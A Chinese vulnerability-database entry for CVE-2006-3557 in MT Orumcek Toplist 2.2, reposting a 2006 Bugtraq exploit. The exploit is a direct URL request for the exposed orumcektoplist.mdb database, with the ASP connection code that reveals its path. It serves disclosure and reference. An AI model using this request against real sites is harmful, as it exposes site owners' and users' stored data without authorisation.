MT Orumcek Toplis 'orumcektoplist.mdb'

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1194173 漏洞类型 未知
发布时间 2006-07-12 更新时间 2006-07-12
CVE编号 CVE-2006-3557 CNNVD-ID CNNVD-200607-194
漏洞平台 N/A CVSS评分 5.0
|漏洞来源
https://www.securityfocus.com/bid/82228
https://cxsecurity.com/issue/WLB-2006070009
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200607-194
|漏洞详情
MTOrumcekToplist2.2将DB/orumcektoplist.mdb储存在没有充分访问控制的web根目录下,可以使远程攻击者通过直接请求来获得敏感信息。
|漏洞EXP
Title       : MT rmcek Toplist v2.2 Version Microsoft Access Driver ( MDB ) Download

-

Site        : http://www.Cyber-Warrior.org

-

Author      : StorMBoY

-

Mail        : StorMBoY (at) BsdMail (dot) Org [email concealed]

-

Exploit     : http://www.target.com/path/db/orumcektoplist.mdb

-

Code :

<%

Set baglanti = Server.CreateObject("ADODB.Connection")

baglanti.Open "DRIVER={Microsoft Access Driver (*.mdb)}; DBQ=" & Server.MapPath("../db/orumcektoplist.mdb")

%>

-

# StorMBoY [08.07.2006]
|受影响的产品
Mt Orumcek Mt Orumcek Toplist 2.2
|参考资料

来源:BUGTRAQ
名称:20060709MTÖrümcekToplistv2.2VersionMicrosoftAccessDriver(MDB)Download
链接:http://www.securityfocus.com/archive/1/archive/1/439611/100/0/threaded
来源:SREASON
名称:1235
链接:http://securityreason.com/securityalert/1235